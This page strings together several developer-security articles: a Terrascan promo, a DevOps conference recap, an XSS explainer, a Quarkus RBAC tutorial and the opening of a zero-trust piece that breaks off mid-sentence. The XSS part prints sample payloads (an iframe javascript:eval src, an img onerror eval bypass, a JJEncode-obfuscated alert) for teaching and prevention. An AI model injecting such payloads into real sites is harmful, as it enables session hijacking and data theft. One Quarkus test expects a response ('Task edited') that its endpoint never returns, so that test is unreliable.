Containers Trend Report. Explore the current state of containers, containerization strategies, and modernizing architecture.
Securing Your Software Supply Chain with JFrog and Azure. Leave with a roadmap for keeping your company and customers safe.
The topic of security covers many different facets within the SDLC. From focusing on secure application design to designing systems to protect computers, data, and networks against potential attacks, it is clear that security should be top of mind for all developers. This Zone provides the latest information on application vulnerabilities, how to incorporate security earlier in your SDLC practices, data governance, and more.
From Kubernetes to Argo to Docker to Terraform, the most influential cloud-native innovations are open source. The high velocity and mass adoption of projects like Kubernetes show that in order to keep pace with innovation, the cloud-native community must come together, share best practices, foster collaboration, and contribute to next-generation technologies. Open-Source and Cloud-Native The Cloud Native Computing Foundation (CNCF), the largest open-source community in the world and the host of international events like KubeCon + CloudNativeCon and CloudNativeSecurityCon, rallies around the idea that open source and democratizing innovation are the best ways to make cloud-native technologies widely available. As a subset of the Linux Foundation, the CNCF brings together thousands of developers and cloud architects around the world to create and maintain hundreds of cloud-native open-source projects. With cloud infrastructure becoming increasingly complex, open-source tools like Terrascan by Tenable can help ensure the code developers write to provision cloud resources is secure and compliant with industry standards. By providing transparency and flexibility, open-source software can help organizations customize their security solutions to meet their unique needs and adapt to changing cyber threats. Many companies are taking advantage of these benefits. According to Open UK’s “State of Open: The UK in 2021 Phase Three The Values of Open” report that surveyed over 273 respondents, the vast majority (89%) are using open-source software. Let’s look at how cloud security might play out using Terrascan by Tenable as an example. What Is Terrascan by Tenable? Terrascan by Tenable is a static code analyzer that can detect compliance and security violations across infrastructure as code (IaC) to mitigate risks before provisioning cloud-native infrastructure. You can scan many IaC types, including Azure Resource Manager, Kubernetes, Docker, and Terraform (hence the name “Terrascan”). Because it’s a code analyzer, Terrascan can be integrated into many tools in the development pipeline. When integrated, misconfiguration scanning is automated as part of the commit or build process. It can run on a developer’s laptop, a software configuration manager (SCM) (e.g., GitHub), and continuous integration/continuous development (CI/CD)servers (e.g., ArgoCD and Jenkins) or in your browser with the Terrascan sandbox. In addition, it also has a built-in admission controller for Kubernetes, which helps control new resources created on a cluster. With integration into Kubernetes admission controllers, you can prevent insecure resources from entering your Kubernetes environment. Terrascan by Tenable in Action: A Case Study To illustrate the benefits of Terrascan, let's consider a hypothetical scenario based on real-world customer experiences in which a company is migrating its on-premises infrastructure to the cloud. The DevOps team is using Terraform to automate infrastructure provisioning, but the security team is concerned about potential security issues in the company’s code and the propagation of misconfigurations in runtime. Because of this, they have to slow down developers and ensure that all IaC is secure through rigorous manual processes. Terrascan scans the company’s Terraform code against a set of policies based on industry frameworks, such as the Center for Internet Security (CIS) and the National Institute of Standards and Technology (NIST), and identifies weaknesses in the developers’ code that could allow unauthorized access to port 22 (SSH). By discovering the problem in the code, the security team can require the cloud resource to only allow secure shell (SSH) access from a specific subnet classless inter-domain routing (CIDR) that complies with their security policies. As a result, developers are able to remediate the issue before it leaves a developer workstation, gets pushed to a git repository, or is provisioned in the cloud. They’ve saved time and headaches, ensuring that their cloud environment is secure and compliant with industry — and their security team’s — standards. Terrascan has more than 500 built-in policies. By integrating Terrascan into CI/CD pipelines, developers ensure their code is scanned for security issues at every stage of development. They’re making sure that only secure code makes it into production. In summary, open-source tools like Terrascan are an important part of ensuring security in cloud infrastructure. By standardizing security policies and democratizing access to them, the cloud-native community can work together to identify and mitigate potential risks, ultimately creating a more secure cloud environment for everyone.
If you know anything about St. Louis, it is likely the home of the Gateway Arch, the Cardinals, and St. Louis-style BBQ. But it is also home to a DevOps event that featured some fresh perspectives on scaling, migrating legacy apps to the cloud, and how to think about value when it comes to your applications and environments; DevOps Midwest. The quality of the conversations was notable, as this event drew experts and attendees who were working on interesting enterprise problems of scale, availability, and security. The speakers covered a wide range of DevOps topics, but throughout the day, a couple of themes kept showing up: DevSecOps and secrets management. Here are just a few highlights from this amazing event. Lessons Learned From Helping Agencies Adopt DevSecOps In his sessions "Getting from "DevSecOps" to DevSecOps: What Has Worked and What Hasn't- Yet." Gene Gotimer shared some of the stories from his life helping multiple US government agencies understand and adopt DevOps. Show Value From the Start, Don't Wait for Them to 'Get It' While he worked for DISA, the Defense Information Systems Agency, he helped them evaluate the path to go from manual releases to a more automated path. The challenge he faced was getting them to see the value of CI/CD. He focused on adding automated testing earlier in their process, which is at the heart of the DevSecOps' shift left' strategy. He met unexpected resistance as the teams failed to 'just get it' and see the long-term benefits of the new approach, mainly due to their lack of familiarity with testing best practices, resulting in making implementation decisions that caused overall longer testing cycles. His biggest takeaway from the experience was realizing the established team was not going to have an 'ah ha' moment where they just collectively see the value. Value needs to be clearly defined in the goals of a project. Ultimately, you need to show that the new path is not just 'good' but is it overall better, stated in values the existing team understands. Never Let a Crisis Go to Waste: Be Ready In another engagement, this time with the TSA, the Transportation Security Administration, he built a highly secure DevOps pipeline based on Chef that was capable of automatically updating dependencies on hundreds of systems. After a year of work, he was limited to only showing demos of his tools, and he was restricted to a sandbox. The fear of a new approach and the reluctance to change meant he was only able to roll out the new tooling only when it was a last resort. An emergency meant doing updates the old way could not meet a deadline that was driven by a new vulnerability, so they gave his new tooling a chance. After successfully updating all the systems in a few short hours, the department lead was joyous that the 'last year of work meant they could update so fast.' But the reality is it took them a year to hit a crisis point that forced the change. The tool had been ready for months. It was only after the whole team saw the new approach in action that resistance disappeared. The larger lesson he took away from this was that being ready paid off. If they had come to him and he had not been ready to meet the moment, then the team would have never experienced the benefits of an automated approach. Carrots Not Sticks The final story Gene shared was about his time working for ICE, U.S. Immigration, and Customs Enforcement. While there, he worked to improve their security while working in AWS GovCloud. While the team was practicing DevOps, they had over 150 security issues in their build process, which took over 20 minutes to complete. He and his team worked to lower those security issues to less than twenty overall while tuning the whole process to take around six minutes. Unfortunately, the new system was not approved or adopted for many months. Gene's security team had been trying to sell the security benefits, which never took priority for the DevOps team. While there was administrative buy-in, the new process was not adopted until, finally, a different, smaller team realized the new process was 3x faster than their approach. They saw security as a side benefit. In the end, as other teams started adopting the faster process, the overall security was improved. Gene stressed that they could have gone to the CIO and demanded that the new approach be used for security reasons, but knew that would mean even more resistance overall. What ended up working was showing that the new way was ultimately better, easier, and faster. Gene ended his talk by reminding us always to continue building interesting things and to keep learning and innovating. He left us with a quote from Andrew Clay Shafer, a pioneer in DevOps: "You’re either building a learning organization, or you are losing to someone who is." Secrets Management in DevOps Three different talks at DevOps Midwest dealt with secret security in DevOps explicitly. Two talks discussed security in the context of the migration of applications to the cloud, and one talked about the problems of secrets in code and how git can help keep you safe. Picking a (Safe) Cloud Migration Strategy In his talk "You're Not Just the Apps Guy Anymore; Embracing Cloud DevOps," John Richards of Paladin Cloud covered why moving to the cloud matters as well as the challenges and unique opportunities that migrating to the cloud brings. He laid out three migration strategies. 1. Lift and shift 2. Re-architecture 3. Rebuild with cloud-native tools In "lift and shift," you simply take the existing application and drop it into a cloud environment. This can bring the ability to scale on demand, but it also means you are not reaping the full benefits of the cloud. While this is the fastest and least costly method, you still need to spend time figuring out how to "connect the plumbing." Part of that plumbing is figuring out how to call for secrets in the cloud. Most likely, while the application lived on an on-prem server, the secrets were previously stored on the same machine. Setting and leveraging the built-in environment variables in the cloud is a good short-term step for teams crunched for time. He lays out better secret management approaches in the other migration paths. In a re-architecture, you start with a 'lift and shift' migration and slowly build onto it, changing the application slowly over time to take advantage of the scale and performance gains the cloud offers. This is a flexible path but requires a higher overall investment, but if done correctly, the team can maximize value while building for the future. This is a good time for more robust secrets management to be adopted, especially as more third-party services need authentication and authorization. Tools like Vault or the built-in cloud services can be rolled out as the application evolves. The third path is completely rebuilding the application with cloud-native tools. This is the most expensive migration path but brings the greatest benefits. This approach allows you to innovate, taking advantage of edge computing and technology that was simply not available when the legacy application was first created. This also means adopting new secret management tools immediately and across the whole team at once. This approach definitely requires the highest level of buy-in from all teams involved. John also talked about shared cloud responsibility. For teams used to controlling and locking down on-premises servers, it is going to be an adjustment to partner with the cloud providers to defend your applications. Living in a world of dynamic attack surfaces makes defense-in-depth a necessity, not a nice to have; secrets detection and vulnerability scanning are mandatory parts of this approach. Your cloud provider can only protect you so much… misconfiguration or leaving your keys out in the open will lead to bad things. How To Migrate to the Cloud Safely While John's talk took a high-level approach to possible migration paths, Andrew Kirkpatrick from StackAdapt, gave us a very granular view of how to actually perform migration in his session "Containerizing Legacy Apps with Dynamic File-Based Configurations and Secrets." Andrew walked us through the process of taking an old PHP-based BBS running on a single legacy server and moving it to containers, making it highly scalable and highly available in the process. He also managed to make it more secure along the way. He argued that every company has some legacy code that is still running in production and that someone has to maintain it, but nobody wants to touch it. The older the code, the higher the likelihood that patches will introduce new bugs. Andrew said that the sooner you move it to containers and the cloud, the better off everyone is going to be and the more value you can extract from that application. While the lift and shift approach might not seem like the best use of advanced tools like Docker Swarm or Helm, in all reality. "you can use fancy new tech to run terrible, ancient software, and the tech doesn't care. He warned that most tutorials out there make some assumptions you have to take into account. While they might get you to a containerized app, most tutorials do not factor in scale or security concerns. For example, if a tutorial just says to download an image, it does not tell you to make sure there are no open issues with the image on Docker Hub. If you downloaded the Alpine Linux Docker image in the three years that the unlocked root accounts issue went unsolved, your tutorial did not likely account for that. Once he got the BBS software running in a new container, he addressed the need to connect it to the legacy DB. He laid out a few paths for possibly managing the needed credentials, but the safest by far would be to use a secrets manager like Hashicorp Vault or Doppler. He also suggested a novel approach for leveraging these types of tools, storing configuration values. While secrets managers are designed to safely store credentials and give you a way to programmatically call them to the tool, those keys are all just arbitrary strings. There is no reason you could not store settings values alongside your secrets and programmatically call them when you are building a container. Leveraging Git to Keep Your Secrets Secret The final talk that mentioned keeping your secrets out of source code was presented by me, the author of this article. I was extremely happy to be part of the event and present an extended version of my talk, "Stop Committing Your Secrets - Git Hooks To The Rescue!" In this session, I laid out some of the findings of the State of Secrets Sprawl report: 10M secrets found exposed in 2022 in public GitHub repositories. That is a more than 67% increase compared to the six million found in 2021. On average, 5.5 commits out of 1,000 exposed at least one secret. That is a more than 50% increase compared to 2021. At the heart of this research is git, the most widely used version control system on earth and the defacto transportation mechanism for modern DevOps. In a perfect world, we would all be using secret managers throughout our work, as well as built-in tools like `.gitignore` to keep our credentials out of our tracked code histories. But even in organizations where those tools and workflows are in place, human error still happens. What we need is some sort of automation to stop us from making a git commit if a secret has been left in our code. Fortunately, git gives us a way to do this on every attempt to commit with git hooks. Any script stored in the git hooks folder that is also named exactly the same as one of the 17 available git hooks will get fired off by git when that git event is triggered. For example, a script called `pre-commit` will execute when `git commit` is called from the terminal. GitGuardian makes it very easy to enable the pre-commit check you want, thanks to ggshield. In just three quick commands, you can install, authenticate the tool, and set up the needed git hook at a global level, meaning all your local repositories will run the same pre-commit check. JavaScript $ pip install ggshield $ ggshield auth login $ ggshield install --mode global This free CLI tool can be used to scan your repositories as well whenever you want; no need to wait for your next commit. After setting up your pre-commit hook, each time you run `git commit,` GitGuardain will scan the index and stop the commit and tell you exactly where the secret is and what kind of secret is involved, and give you some helpful tips on remediation. DevSecOps Is a Global Community: Including the Midwest While many of the participants at DevOps Midwest were, predictably, from the St. Louis area, everyone at the event is part of a larger global community. A community that is not defined by geographic boundaries but is instead united by a common vision. DevOps believes that we can make a better world by embracing continuous feedback loops to improve collaboration between teams and users. We believe that if repetitive and time-consuming tasks can be automated, they should be automated. We believe that high availability and scalability go hand-in-hand with improved security. No matter what approach you take to migrate to the cloud or what specific platforms and tools you end up selecting, keeping your secrets safe should be a priority. Using services can help you understand the state of your own secrets sprawl on legacy applications as you are preparing to move through historical scanning and keep you safe as the application runs in its new home, thanks to our real-time scanning. And with ggshield, you can keep those secrets that do slip into your work out of your shared repos.
What Is Cross-Site Scripting? Cross-Site Scripting (XSS) is a code-injection vulnerability that occurs in applications that process HTML when developers do not sanitize user input well enough before inserting it into an HTML template. It allows an attacker to insert arbitrary JavaScript code into a template and execute it in the user’s context: In the image above, the developer failed to sanitize the content of the "last-name" div, which resulted in users being able to include malicious scripts by manipulating their last name. Is XSS Common? Despite the fact that numerous frameworks and libraries provide users with all the necessary tools to get rid of XSS, this is still one of the most common vulnerabilities found in web applications. It consistently appears in the OWASP list of the Top Web Application Security Risks and was used in 40% of online cyberattacks against large enterprises in Europe and North America in 2019. According to HackerOne, XSS vulnerabilities are the most common vulnerability type discovered in bug bounty programs. Where Can I Spot XSS Vulnerability? There are two types of Cross-Site Scripting: Client-Side XSS Server-Side XSS The most common kind of XSS. It happens on the client side (in browsers or desktop apps) and is a consequence of not properly sanitizing user-supplied data before inserting it into the DOM. This is quite rare, however possible. It happens when the server transforms HTML files into other documents (most likely, PDFs), and the library does not whitelist what kind of code it executes. You can read about Dynamic PDF vulnerability on HackTricks. Is XSS Really That Dangerous? Simply put, it’s a disaster. Here’s a list of what an attacker can do if they’re able to exploit an XSS vulnerability on the client side: Remote Code Execution (Browser exploits, CMS exploitation) Session Hijacking Bypass CSRF protection Keylogging Forced Downloads Man-in-the-Middle Attacks All sorts of phishing: Credential Harvesting, Ad-jacking (Ad injection), Clickjacking, Redirecting users to a malicious website, etc. Stealing data from local- session- web- storages, cookies, IndexedDB, page source code, taking screenshots DoS and DDoS Content Spoofing Pivoting into hidden, internal networks, protected by firewalls: JS can be used for host & port discovery, service identification, and interaction (Is extremely slow) Stealing geo-location, capturing audio, web camera, or gyroscope data (requires explicit permission) Crypto mining (Is hard, the browser will try to protect a user) Server-Side XSS is even worse because it allows: Remote Code Execution Local File Inclusion Server-Side Request Forgery Internal Path Disclosure Stealing information from the result document DoS Crypto mining The attacker is also able to get information and control the tab in real-time mode: Misconceptions About XSS “XSS Is Not a Threat if the Website Uses HTTP-Only Cookies for Authentication” I hear that a lot and that’s just ridiculous. Yes, an attacker can’t steal HTTP-only cookies with JavaScript; however, they don’t even need to. The true danger of XSS comes from the ability to execute arbitrary JS in the current user’s context. If an attacker can’t steal the cookie and attach it to malicious requests made from their machine, they’ll just move the malware into the victim’s browser, and the browser will attach the cookies for them. I admit the exploitation becomes more complicated; however, it’s A LOT stealthier and safer for the attacker. “XSS Is a Non-Persistent Type of Attack #1: I Leave the Vulnerable Page, and It’s Fine” Wrong again! Once an attacker can inject arbitrary JS into your browser, they can change the application’s behavior so that you NEVER leave the vulnerable page. By manipulating requests/responses and the HTML DOM, they can make it seem like you left the page by re-rendering new content on the vulnerable page. However, this kind of trickery can be defeated if the user manually types the URL they’re interested in into the address bar. “Xss Is a Non-Persistent Type of Attack #2: I Just Leave the Website, and It’s Fine” That is not true: malicious JavaScript files CAN be persisted in your browser. That’s rare but still possible via Server Workers. To register a malicious service worker, one of the following conditions must be met: An attacker has to write access on the frontend server There’s an unfiltered JSONP endpoint exposed If an attacker manages to register a malicious Service Worker, they can maintain persistence in your browser indefinitely. Service Workers can be used to sniff and modify traffic (for instance, to supply new malicious scripts with each response). Check out the ShadowWorkers project for more details. How Many Types of XSS Are There? There are several different ways of XSS manifestation. Security specialists usually single out 3. Dom-Based XSS. DOM XSS stands for Document Object Model-based Cross-site Scripting. A DOM-based XSS attack is possible if the web application writes data to the Document Object Model without proper sanitizing. The attacker can manipulate this data to include malware on the web page. Key points: Generally, DOM-Based cross-site scripting attacks are client-side attacks. Malicious code might never reach the server. Malware is executed AFTER the HTML template is rendered; it happens at some point during runtime. Reflected XSS. Reflected XSS occurs when the server takes a part of a request and inserts it into the response without proper sanitizing. Key points: Reflected XSS payload ALWAYS reaches the server; it is part of both request and response. Unlike DOM-Based XSS, Reflected XSS payload is executed WHILE a browser renders an HTML template since the payload is part of the response and usually is embedded into the template. Stored XSS. Stored XSS happens when developers blindly trust data that’s being stored in their databases, web-caches, files, etc. Key points: Stored XSS is saved somewhere (not necessarily the database) for a while The payload might be executed on multiple pages and usually does not require any user interaction to fire (unlike DOM-Based and Reflected XSS, which are usually spread via malicious links and require user interaction). If I Use React, Am I Safe Then? Surprise reveal: React is not fully safe from XSS, although it really tries to protect users from it. There are several ways to inject malicious JS into a React app: React does not filter what you’re passing to props: href (Exploitation via “javascript:” or “data:text/html” URI) src (Exploitation via “javascript:” or “data:text/html” URI) srcDoc (Exploitation via inserting malicios HTML) formAction (Exploitation via “eval(...arbitrary js)”) data (Exploitation via “javascript:” or “data:text/html” URI) React also allows you to directly manipulate the DOM, bypassing its restrictions and protections. You can achieve this by using the dangerouslySetInnerHTML prop. As a “Security precaution”, React ignores <script> tags whenever they’re inserted into dangerouslySetInnerHTML. This protection can be easily bypassed by modifying the XSS payload, like: Using <iframe src=”javascript:eval(...)”/> or <img id=’_malware_’ src=’x’ onerror=’eval(this.id)’ /> Such mutations allow you to inject <script> tags into the DOM The last known way to inject malicious code into a React app is by abusing the user-controlled props object. If an attacker has control over the props object’s keys, they might be able to embed an exploit by either abusing href, src, srcDoc, data, formAction attributes, or by poisoning props with dangerouslySetInnerHTML. This is especially dangerous if users have control over the JSX tag that’s being inserted into the React tree. How Can I Prevent XSS? The first step would be to encode data on output. According to Portswigger Web Security Academy, encoding should be applied directly before user-controllable data is written to a page because the context you're writing into determines what kind of encoding you need to use. For example, values inside a JavaScript string require a different type of escaping to those in an HTML context. In an HTML context, you should convert non-whitelisted values into HTML entities: < converts to: < > converts to: > In a JavaScript string context, non-alphanumeric values should be Unicode-escaped: < converts to: \u003c > converts to: \u003e Validate Input on Arrival You should validate any user input as strictly as possible. For instance: If a user submits a URL, manually cast it to a URL class and verify that it starts with a safe protocol (HTTP / HTTPS) If a user supplies a value that is expected to be numeric, explicitly cast it to a number Validate that input contains only an expected set of characters Whitelisting and Blacklisting Input validation should generally employ whitelists rather than blacklists. For example, instead of trying to make a list of all harmful protocols (javascript, data, etc.), simply make a list of safe protocols (HTTP, HTTPS) and disallow anything not on the list. Allowing "Safe" HTML The best option is to use a JavaScript library that performs filtering and encoding in the user's browser, such as DOMPurify. Other libraries allow users to provide content in markdown format and convert the markdown into HTML. Unfortunately, all these libraries have XSS vulnerabilities from time to time, so this is not a perfect solution. If you do use one, you should monitor closely for security updates. If you’re using a frontend framework, your other option is to parse it into that framework’s elements, like in the JSX tree in React. There are libraries that do that; however, parsing it manually is not that hard, so if you know exactly what kind of HTML you’re supposed to render, it might be safer to do it yourself. That way, you’ll definitely avoid dangerous props, event handlers, and harmful CSS. Mitigating XSS Using Content Security Policy (CSP) CSP is the last line of defense against cross-site scripting. If your XSS prevention fails, you can use CSP to mitigate XSS by restricting what an attacker can do. CSP lets you control various things, such as whether external scripts can be loaded and whether inline scripts will be executed. To deploy CSP, you need to include an HTTP response header called Content-Security-Policy with a value containing your policy. An example of CSP is as follows: default-src 'self'; script-src 'self'; object-src 'none'; frame-src 'none'; base-uri 'none'; This policy specifies that resources such as images and scripts can only be loaded from the same origin as the main page. So even if an attacker can successfully inject an XSS payload, they can only load resources from the current origin. If you require the loading of external resources, ensure you only allow scripts that do not aid an attacker in exploiting your site. For example, if you whitelist certain domains, then an attacker can load any script from those domains. Where possible, try to host resources on your own domain. If that is not possible, then you can use a hash- or nonce-based policy to allow scripts on different domains. A nonce is a random string that is added as an attribute of a script or resource, which will only be executed if the random string matches the server-generated one. An attacker is unable to guess the randomized string and, therefore, cannot invoke a script or resource with a valid nonce, so the resource will not be executed. Server-Side Protection Using server-side protection, such as Web-Application Firewalls and Intrusion Prevention Systems, can help you reject XSS payloads sent to your server. For instance, AWS WAF and Snort IPS have sets of rules that detect the most common XSS payloads, such as ‘<script>alert(1)</script>’. Additionally, IPS systems ship with known exploit traffic signatures; for example, Snort is able to detect and disrupt exploitation of CVE-2011-1897 — XSS vulnerability in Microsoft Forefront Unified Access Gateway. Beware of Inserting User Input Into the “Script” Tag If an attacker is able to insert JS where it’s being evaluated, there's not much you can do. There are numerous ways to encode and mutate malicious scripts by using dedicated obfuscators or esoteric JS dialects, like Katakana, JJEncode, or JSFuck. Consider the following JJEncode snippet: JavaScript ```js $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"") [$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$ $_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$. $_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($. $=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+ (!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$. $_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.__$+")"+"\"") ())(); ``` When inserted in a <script> tag, it evaluates to alert(1). A home-baked regular expression can’t help because there’s not a single suspicious word or a control character in here.
REST APIs are the heart of any modern software application. Securing access to REST APIs is critical for preventing unauthorized actions and protecting sensitive data. Additionally, companies must comply with regulations and standards to operate successfully. This article describes how we can protect REST APIs using Role-based access control (RBAC) in the Quarkus Java framework. Quarkus is an open-source, full-stack Java framework designed for building cloud-native, containerized applications. The Quarkus Java framework comes with native support for RBAC, which will be the initial focus of this article. Additionally, the article will cover building a custom solution to secure REST endpoints. Concepts Authentication: Authentication is the process of validating a user's identity and typically involves utilizing a username and password. (However, other approaches, such as biometric and two-factor authentication, can also be employed). Authentication is a critical element of security and is vital for protecting systems and resources against unauthorized access. Authorization: Authorization is the process of verifying if a user has the necessary privileges to access a particular resource or execute an action. Usually, authorization follows authentication. Several methods, such as role-based access control and attribute-based access control, can be employed to implement authorization. Role-Based Access Control: Role-based access control (RBAC) is a security model that grants users access to resources based on the roles assigned to them. In RBAC, users are assigned to specific roles, and each role is given permissions that are necessary to perform their job functions. Gateway: In a conventional software setup, the gateway is responsible for authenticating the client and validating whether the client has the necessary permissions to access the resource. Gateway authentication plays a critical role in securing microservices-based architectures, as it allows organizations to implement centralized authentication. Token-based authentication: This is a technique where the gateway provides an access token to the client following successful authentication. The client then presents the access token to the gateway with each subsequent request. JWT: JSON Web Token (JWT) is a widely accepted standard for securely transmitting information between parties in the form of a JSON object. On successful login, the gateway generates a JWT and sends it back to the client. The client then includes the JWT in the header of each subsequent request to the server. The JWT can include required permissions that can be used to allow or deny access to APIs based on the user's authorization level. Example Application Consider a simple application that includes REST APIs for creating and retrieving tasks. The application has two user roles: Admin — allowed to read and write. Member — allowed to read-only. Admin and Member can access the GET API; however, only Admins are authorized to use the POST API. Java @Path("/task") public class TaskResource { @GET @Produces(MediaType.TEXT_PLAIN) public String getTask() { return "Task Data"; } @POST @Produces(MediaType.TEXT_PLAIN) public String createTask() { return "Valid Task received"; } } Configure Quarkus Security Modules In order to process and verify incoming JWTs in Quarkus, the following JWT security modules need to be included. For a maven-based project, add the following to pom.xml XML <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-smallrye-jwt</artifactId> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-smallrye-jwt-build</artifactId> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-test-security-jwt</artifactId> <scope>test</scope> </dependency> For a gradle-based project, add the following: Groovy implementation("io.quarkus:quarkus-smallrye-jwt") implementation("io.quarkus:quarkus-smallrye-jwt-build") testImplementation("io.quarkus:quarkus-test-security-jwt") Implementing RBAC Quarkus provides built-in RBAC support to protect REST APIs based on user roles. This can be done in a few steps. Step 1 The first step in utilizing Quarkus' built-in RBAC support is to annotate the APIs with the roles that are allowed to access them. The annotation to be added is @RolesAllowed, which is a JSR 250 security annotation that indicates that the given endpoint is accessible only if the user belongs to the specified role. Java @GET @RolesAllowed({"Admin", "Member"}) @Produces(MediaType.TEXT_PLAIN) public String getTask() { return "Task Data"; } @POST @RolesAllowed({"Admin"}) @Produces(MediaType.TEXT_PLAIN) public String createTask() { return "Valid Task received"; } Step 2 The next step is to configure the issuer URL and the public key. This enables Quarkus to verify the JWT and ensure it has not been tampered with. This can be done by adding the following properties to the application.properties file located in the /resources folder. Properties files mp.jwt.verify.publickey.location=publicKey.pem mp.jwt.verify.issuer=https://myapp.com/issuer quarkus.native.resources.includes=publicKey.pem mp.jwt.verify.publickey.location - This configuration specifies the location of the public key to Quarkus, which must be located in the classpath. The default location Quarkus looks for is the /resources folder. mp.jwt.verify.issuer - This property represents the issuer of the token, who created it and signed it with their private key. quarkus.native.resources.includes - this property informs quarks to include the public key as a resource in the native executable. Step 3 The last step is to add your public key to the application. Create a file named publicKey.pem, save the public key in it. Copy the file to the /resources folder located in the /src directory. Testing Quarkus offers robust support for unit testing to ensure code quality, particularly when it comes to RBAC. Using the @TestSecurity annotation, user roles can be defined, and a JWT can be generated to call REST APIs from within unit tests. Java @Test @TestSecurity(user = "testUser", roles = "Admin") public void testTaskPostEndpoint() { given().log().all() .body("{id: task1}") .when().post("/task") .then() .statusCode(200) .body(is("Valid Task received")); } Custom RBAC Implementation As the application grows and incorporates additional features, the built-in RBAC support may become insufficient. A well-written application allows users to create custom roles with specific permissions associated with them. It is important to decouple roles and permissions and avoid hardcoding them in the code. A role can be considered as a collection of permissions, and each API can be labeled with the required permissions to access it. To decouple roles and permissions and provide flexibility to users, let’s expand our example application to include two permissions for tasks. task:read — permission would allow users to read tasks task:write — permission would allow users to create or modify tasks. We can then associate these permissions with the two roles: "Admin" and "Member" Admin: assigned both read and write. ["task:read", "task:write"] Member: would only have read. ["task:read"] Step 1 To associate each API with a permission, we need a custom annotation that simplifies its usage and application. Let's create a new annotation called @Permissions, which accepts a string of permissions that the user must have in order to call the API. Java @Target({ ElementType.METHOD }) @Retention(RetentionPolicy.RUNTIME) public @interface Permissions { String[] value(); } Step 2 The @Permissions annotation can be added to the task APIs to specify the required permissions for accessing them. The GET task API can be accessed if the user has either task:read or task:write permissions, while the POST task API can only be accessed if the user has task:write permission. Java @GET @Permissions({"task:read", "task:write"}) @Produces(MediaType.TEXT_PLAIN) public String getTask() { return "Task Data"; } @POST @Permissions("task:write") @Produces(MediaType.TEXT_PLAIN) public String createTask() { return "Valid Task received"; } Step 3 The last step involves adding a filter that intercepts API requests and verifies if the included JWT has the necessary permissions to call the REST API. The JWT must include the userID as part of the claims, which is the case in a typical application since some form of user identification is included in the JWT token The Reflection API is used to determine the method and its associated annotation that is invoked. In the provided code, user -> role mapping and role -> permissions mapping are stored in HashMaps. In a real-world scenario, this information would be retrieved from a database and cached to allow for faster access. Java @Provider public class PermissionFilter implements ContainerRequestFilter { @Context ResourceInfo resourceInfo; @Inject JsonWebToken jwt; @Override public void filter(ContainerRequestContext requestContext) throws IOException { Method method = resourceInfo.getResourceMethod(); Permissions methodPermAnnotation = method.getAnnotation(Permissions.class); if(methodPermAnnotation != null && checkAccess(methodPermAnnotation)) { System.out.println("Verified permissions"); } else { requestContext.abortWith(Response.status(Response.Status.FORBIDDEN).build()); } } /** * Verify if JWT permissions match the API permissions */ private boolean checkAccess(Permissions perm) { boolean verified = false; if(perm == null) { //If no permission annotation verification failed verified = false; } else if(jwt.getClaim("userId") == null) { // Don’t support Anonymous users verified = false; } else { String userId = jwt.getClaim("userId"); String role = getRolesForUser(userId); String[] userPermissions = getPermissionForRole(role); if(Arrays.asList(userPermissions).stream() .anyMatch(userPerm -> Arrays.asList(perm.value()).contains(userPerm))) { verified = true; } } return verified; } // role -> permission mapping private String[] getPermissionForRole(String role) { Map<String, String[]> rolePermissionMap = new HashMap<>(); rolePermissionMap.put("Admin", new String[] {"task:write", "task:read"}); rolePermissionMap.put("Member", new String[] {"task:read"}); return rolePermissionMap.get(role); } // userId -> role mapping private String getRolesForUser(String userId) { Map<String, String> userMap = new HashMap<>(); userMap.put("1234", "Admin"); userMap.put("6789", "Member"); return userMap.get(userId); } } Testing In a similar way to testing the built-in RBAC, the @TestSecurity annotation can be utilized to create a JWT for testing purposes. Additionally, the Quarkus library offers the @JwtSecurity annotation, which enables the addition of extra claims to the JWT, including the userId claim. Java @Test @TestSecurity(user = "testUser", roles = "Admin") @JwtSecurity(claims = { @Claim(key = "userId", value = "1234") }) public void testTaskPosttEndpoint() { given().log().all() .body("{id: task1}") .when().post("/task") .then() .statusCode(200) .body(is("Task edited")); } @Test @TestSecurity(user = "testUser", roles = "Admin") @JwtSecurity(claims = { @Claim(key = "userId", value = "6789") }) public void testTaskPostMember() { given().log().all() .body("{id: task1}") .when().post("/task") .then() .statusCode(403); } Conclusion As cyber-attacks continue to rise, protecting REST APIs is becoming increasingly crucial. A potential security breach can result in massive financial losses and reputational damage for a company. While Quarkus is a versatile Java framework that provides built-in RBAC support for securing REST APIs, its native support may be inadequate in certain scenarios, particularly for fine-grained access control. The above article covers both the implementation of the built-in RBAC support in Quarkus, as well as the development and testing of a custom role-based access control solution in Quarkus.
Security was mostly perimeter-based while building monolithic applications. It means securing the network perimeter and access control using firewalls. With the advent of microservices architecture, static and network-based perimeters are no longer effective. Nowadays, applications are deployed and managed by container orchestration systems like Kubernetes, which are spread across the cloud. Zero trust network (ZTN) is a different approach to secure data across cloud-based networks. In this article, we will explore how Istio, with ZTN philosophy, can help secure microservices. What Is Zero Trust Network (ZTN)? "Zero trust network" is a security paradigm that does not grant implicit trust to users, devices, and services, and continuously verifies their identity and authorization to access resources. In a microservices architecture, if a service (server) receives a request from another service (client), the server should not assume the trustworthiness of the client. The server should continuously authenticate and authorize a client first and then allow the communication to happen securely (refer to fig. A below). Fig. A: A Zero Trust Network (ZTN) environment where continuous authentication and authorization are enforced between microservices across multicloud. Why Is a Zero Trust Network Environment Inevitable for Microservices? The importance of securing the network and data in a distributed network of services cannot be stressed enough. Below are a few challenges that point to why a ZTN environment is necessary for microservices: Lack of ownership on the network: Applications moved from perimeter-based to multiple clouds and data centers with microservices. As a result, the network has also got distributed, giving more attack surface to intruders. Increased network and security breaches: Data and security breaches among cloud providers are increasingly common since applications moved to public clouds. In 2022, nearly half of all data breaches occurred in the 